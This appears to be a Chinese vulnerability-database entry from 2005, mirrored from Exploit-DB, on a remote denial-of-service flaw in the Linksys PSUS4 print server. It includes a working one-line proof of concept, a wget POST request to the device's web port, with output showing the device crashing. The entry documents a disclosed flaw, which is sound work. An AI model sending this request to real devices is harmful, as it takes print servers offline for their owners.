Linksys PSUS4 PrintServer - POST Denial of Service

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1054880 漏洞类型
发布时间 2005-02-03 更新时间 2005-02-03
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Hardware CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25082
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/12443/info

Linksys PSUS4 PrintServer is reported prone to a remote denial of service vulnerability while handling certain HTTP POST requests received on TCP port 80.

An attacker may exploit this condition to deny service to the affected PrintServer. 

$ wget --post-data="Br1Ce2N1c3" http://192.168.1.2/
--23:10:05-- http://192.168.1.2/
=> `index.html'
Connecting to 192.168.1.2:80... connected.
HTTP request sent, awaiting response...

=> And the PSUS4 is crashed.